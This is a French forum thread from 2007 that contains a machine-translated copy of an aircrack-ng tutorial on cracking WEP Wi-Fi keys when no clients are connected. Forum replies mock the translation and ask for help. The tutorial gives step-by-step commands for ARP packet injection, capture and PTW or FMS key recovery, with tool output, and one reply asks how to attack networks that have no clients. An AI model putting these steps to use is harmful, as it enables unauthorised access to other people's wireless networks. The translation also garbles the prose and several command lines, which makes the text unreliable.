Tcpdump-n-vvv-e-s0-r arp-demande           
En lisant d'arp-demande de fichier, type de liaison IEEE802_11 (802.11)
10:49:17.456350 WEP Chiffré 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast Données IV : 8f Capitonnent 0 KeyID 0
Puisque vous évaluez contre votre AP propre (vous êtes, le droit ?), décryptent ensuite le paquet et assurent que c'est correct. Ces pas ne sont pas exigés, ils prouvent juste à vous que vous avez produit le paquet correct.
Décryptez le paquet :
Airdecap-ng-e Teddy-w



Considérez le paquet décrypté :



Tcpdump-n-r arp-request-dec
Il devrait ressembler à quelque chose :
En lisant du fichier arp-request-dec, le type de liaison EN10MB (Ethernet)
10:49:17.456350 arp qui - a 255.255.255.255 dit 255.255.255.255
Pas 6 - Commence airodump-ng
Ouvrez une autre session de console pour capturer IVs produit. Entrez alors :
Airodump-ng-c 9 - bssid 00:14:6C:7E:40:80-w capturent ath0
Où :
-c 9 est le canal pour le réseau sans fil
--bssid 00:14:6C:7E:40:80 est l'accès dirigent l'adresse de MAC. Cela élimine le trafic étranger.
--ivs specfifies que vous voulez seulement capturer l'IVS. Cela tient le fichier le moins possible. N'utilisez pas cette option en utilisant †œ aircrack-ng-zâ€?.
-w la capture est le préfixe de nom de fichier pour le fichier qui contiendra l'IVS.
Ath0 est le nom d'interface.
Le pas 7 - Injecte le paquet arp
L'utilisation de la session de console où vous avez produit le paquet arp, entre :
Aireplay-ng-2-r arp-demandent ath0
Où :
-2 moyens utilisent le choix d'encadrement interactif
-r l'arp-demande définit le nom de fichier de quel lire le paquet arp
Ath0 définit l'interface pour utiliser
Le système répondra :
      Taille : 68, FromDS : 0, ToDS : 1 (WEP)
     
           BSSID = 00:14:6C:7E:40:80
       Dest. MAC = FF:FF:FF:FF:FF:FF
      MAC Source = 00:09:5B:EC:EE:F2
     
      0x0000 : 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A .... l ~ ... [...
      0x0010 : ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............ z ...
      0x0020 : c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ........... q. Z8.
      0x0030 : f286 fdb3 55ee 113e da14 fb19 17cc 0b5e.... U.. > ....... ^
      0x0040 : 6ada 92f2                                j...
     
      Utilisez ce paquet ? Y
Entrez à †œ yâ€? pour utiliser ce paquet. Le système répond en montrant combien de paquets il injecte et vous rappelle commencer airodumump s'il n'a pas déjà été commencé :
Sauvant(Économisant) le paquet choisi dans replay_src-0204-104917.cap
Vous devriez aussi commencer airodump-ng pour capturer des réponses.

Fin de fichier.
Tandis que cette commande court avec succès, l'écran d'airodump-ng semblera semblable :
CH 9] [Écoulé : 16 s] [2007-02-04 11:04
                                                                                                               
  BSSID              PWR RXQ Balises    *Data, */s CH MO ENC CHIFFRE AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80 47100179      2689     336 9 11 WEP WEP         Teddy                           
                                                                                                               
  BSSID              STATION            PWR Investigations de Paquets Perdues                                             
                                                                                                               
  00:14:6C:7E:40:80 00:09:5B:EC:EE:F2 29     0     2707                                                     
Vous remarquerez que seulement un point d'accès est l'exposition puisque(depuis que) nous avons inclus un filtre airodump-ng pour limiter la capture de BSSID simple. Remarquez aussi que les paquets de station sont grossièrement égaux aux paquets de données BSSID. Cela signifie que l'injection travaille bien. Remarquez aussi le taux de données de 336 paquets par seconde qui est aussi un indicateur(clignotant) que l'injection travaille bien. C'est joli †œ idealâ€? le scénario d'injection.
Bouts(Pourboires) de Diagnostic des pannes
Si les paquets de données BSSID n'augmentent pas, assurez-vous que vous êtes toujours associés au point d'accès. Pour le faire, suivez les instructions tcpdump dans le pas 2.
Le pas 8 - Dirigé aircrack-ng pour obtenir la clef WEP
Commencez une autre session de console et entrez :
Aircrack-ng-z-b 00:14:6C:7E:40:80 capture*.cap
Où :
-z signifie utiliser le PTW la méthode WEP-FORMIDABLE.
Capture*.cap choisit tous les fichiers de décharge commençant avec †œ captureâ€? et aboutissant †œ capâ€?.
-b 00:14:6C:7E:40:80 choisit un point d'accès par lequel nous sommes intéressés
Vous pouvez le diriger en produisant des paquets. Bientôt, la clef WEP sera calculée et présentée. En utilisant la méthode PTW, 40 particules WEP peuvent être craquées avec en tout et pour tout que 20,000 paquets de données et 104 particules WEP avec 40,000 paquets de données. Comme un rappel, la méthode PTW travaille seulement avec succès avec arp demandent/répondent des paquets. Puisque cette classe de travaux dirigés couvre l'injection arp des paquets de demande, vous pouvez correctement utiliser cette méthode. L'autre exigence(condition) est que vous capturez le plein paquet avec airodump-ng. La signification, n'utilisez pas l'†œ --ivsâ€? l'option.
Si vous n'utilisez pas l'option â€?-zâ€?, donc la méthode FMS/Korek est appliquée. Vous aurez alors besoin d'environ 250,000 IVs pour 64 particules et 1,500,000 IVs pour 128bit des clefs. Ceux-ci sont très approximatifs et il y a beaucoup de variables quant à combien d'IVS vous devez en réalité forcer la clef WEP.
Bouts(Pourboires) de Diagnostic des pannes :
Parfois vous devez essayer des techniques diverses pour forcer la clef WEP. Essayez â€?-nâ€? pour mettre des longueurs clefs diverses. Utilisez â€?-fâ€? et essayez divers esquivent des facteurs. Utilisez â€?-kâ€? et essayez de mettre hors de service des méthodes korek diverses.
Solution Supplémentaire
Il y a un tour propre qui simplifie le forcement WEP sans clients. Essentiellement il prend n'importe quelle émission de paquet par l'accès indiquent et le convertit en paquet d'émission tel que le point d'accès produit de nouveaux IV.
Il est important de comprendre que si vous utilisez ce tour, alors vous ne pouvez pas utiliser l'â€?-zâ€? PTW l'option de méthode quand la fente la clef WEP. C'est parce que la méthode PTW qu'exige arp demande/réponde des paquets et ce tour ne les produit pas.
Bien, à ce point vous demandez pourquoi vous ne m'avez pas montré cette technique directement au début ? La raison est que cette technique réémet n'importe quel paquet de taille que vous recevez. Ainsi si vous recevez un paquet de 1000 octets vous réémettez alors 1000 octets. Cela ralentit potentiellement les paquets par deuxième taux considérablement. Cependant, sur le bon côté de nouvelles, c'est simple et facile à utiliser. Vous pourriez aussi devenir chanceux et recevoir un très petit paquet pour la reradiodiffusion. Dans ce cas, l'exécution(la performance) est comparable avec la solution décrite ci-dessus.
Les mêmes suppositions s'appliquent et vous devez aussi faire une authentification fausse couronnée de succès d'abord.
Entrez à la commande suivante :
Aireplay-ng-2-p 0841-c FF:FF:FF:FF:FF:FF-b 00:14:6C:7E:40:80-h 00:09:5B:EC:EE:F2 ath0
Où :
-2 moyens utilisent le choix d'encadrement interactif
-p 0841 jeux le Champ(Domaine) de Contrôle d'Encadrement tel que le paquet ressemble c'est envoyé d'un client sans fil.
C FF:FF:FF:FF:FF:FF fait la destination l'adresse de MAC être une émission. C'est exigé pour causer que l'AP rejoue le paquet et ainsi l'obtention des nouveaux IV.
-b 00:14:6C:7E:40:80 est l'accès dirigent l'adresse de MAC
-h 00:09:5B:EC:EE:F2 est l'adresse de MAC de notre carte et doit correspondre au MAC utilisé dans l'authentification fausse
Ath0 définit l'interface pour utiliser
Le système répondra :
Lisez 698 paquets...

      Taille : 86, FromDS : 1, ToDS : 0 (WEP)

           BSSID = 00:14:6C:7E:40:80
       Dest. MAC = FF:FF:FF:FF:FF:FF
      MAC Source = 00:D0:CF:03:34:8C

      0x0000 : 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B .......... l ~.
      0x0010 : 00d0 cf03 348c a0f4 2000 0000 e233 962a .... 4 ... .... 3.*
      0x0020 : 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ... gA ... rq ... * ..
      0x0030 : ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U ... o .. 5_ ......
      0x0040 : 1daa a308 6a70 4465 9fa6 5467 d588 c10c .... jpDe.. Tg ....
      0x0050 : f043 09f6 5418                           .C.. T.

Utilisez ce paquet ? Y
Vous entrez à †œ yâ€? pour choisir le paquet et commencez à l'injecter. Rappelez-vous, plus petit le paquet, mieux. Vous commencez alors à injecter :
Économie(Sauvetage) de paquet choisi dans replay_src-0411-145110.cap

Envoyé 10204 paquets ... (455 pps)
Si vous n'avez pas déjà commencé airodump-ng, vous assurez de le commencer maintenant. Une fois que vous avez IVs suffisant, vous pouvez commencer aircrack-ng et essayer de forcer la clef WEP.
Une autre variation de cette attaque doit utiliser des paquets d'une capture précédente. Vous devez avoir capturé les pleins paquets, non juste l'IVS.
Voici à quoi la commande ressemblerait :
Aireplay-ng-2-p 0841-c FF:FF:FF:FF:FF:FF-b 00:14:6C:7E:40:80-h 00:09:5B:EC:EE:F2-r capturent-01.cap ath0
Où â€?-r la capture-01.capâ€? est des données d'une capture précédente.
how_to_crack_wep_with_no_clients.txt · Dernier modifié : 2007/08/21 01:26 par darkaudax
   
   
   
   

page traduite ! si comme moi l anglais pour vous c du chinois...


carte D-LINK Atheros PCI
alpha H et portable en dualboot.XPpro backtrack3final

Hors Ligne

#17 22-10-2007 15:57:24

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : augmentation paquet procédure bonne ?

Vive la traduction google, tu aurais pu eviter de traduite les lignes de commande car là tu na vas pas aider ceux qui captent rien. cool

Hors Ligne

#18 22-10-2007 18:59:30

spoon0390225
Membre
Inscription : 05-10-2007
Messages : 36

Re : augmentation paquet procédure bonne ?

bonjour whaouuuu c est clair que ce n est pas facile a comprendre avec ce copier collé a  l arache sad

c est vrais que je fais des test la j en suis la "  quant il n y a pas de station conecté" comment fait ont ??? j ai suivis differente piste de lien here et autre mais cest pas gagné

Tutorial: How to crack WEP with no wireless clients smile
MAC address of PC running aircrack-ng suite: 00:09:5B:EC:EE:F2  cest dire ma macadress ou une autre au hasard ???

http://www.aircrack-ng.org/doku.php?id= … 0baabedd2a

merci de vos aides smile seront les bienvenue smile

Dernière modification par spoon0390225 (22-10-2007 19:43:42)


ALFA 500 mW      + l alfa " sa soeur "
acer aspire 5020  + cd bootabla bt 3 , bt2

Hors Ligne

#19 23-10-2007 13:03:30

Jolinar
Membre
Inscription : 10-10-2007
Messages : 21

Re : augmentation paquet procédure bonne ?

salut à tous !

c'était mon cas, y avais jamais de mac station....
j'ai donc suivi le tuto sur la méthode "uniquement client en ethernet" et ça a marché nickel.

Hors Ligne

#20 23-10-2007 13:47:20

spoon0390225
Membre
Inscription : 05-10-2007
Messages : 36

Re : augmentation paquet procédure bonne ?

salut et merci d avoir été tres precis sur le sujet ...


ALFA 500 mW      + l alfa " sa soeur "
acer aspire 5020  + cd bootabla bt 3 , bt2

Hors Ligne

#21 23-10-2007 21:40:54

killbill
Membre
Inscription : 28-06-2007
Messages : 323

Re : augmentation paquet procédure bonne ?

ben je pensait avoir supprimé cette traduction c pas google c reverso prompt j avoue que c a peine mieux
vraiment je pensait avoir supp cette "mauvaise" idee ...
mais ceci peut servir a tous ! petite citation de moralité :
quand ta rien a poster ne poste pas !! lol lol

Dernière modification par killbill (23-10-2007 21:48:34)


carte D-LINK Atheros PCI
alpha H et portable en dualboot.XPpro backtrack3final

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
5 1110 19-09-2008 20:21:12 par dédé
1 737 21-05-2008 20:47:39 par dédé
6 1304 09-04-2008 14:23:03 par rivaldovitor
2 957 22-02-2008 14:20:51 par sharkoon
1 663 14-02-2008 12:20:38 par Tex-Twil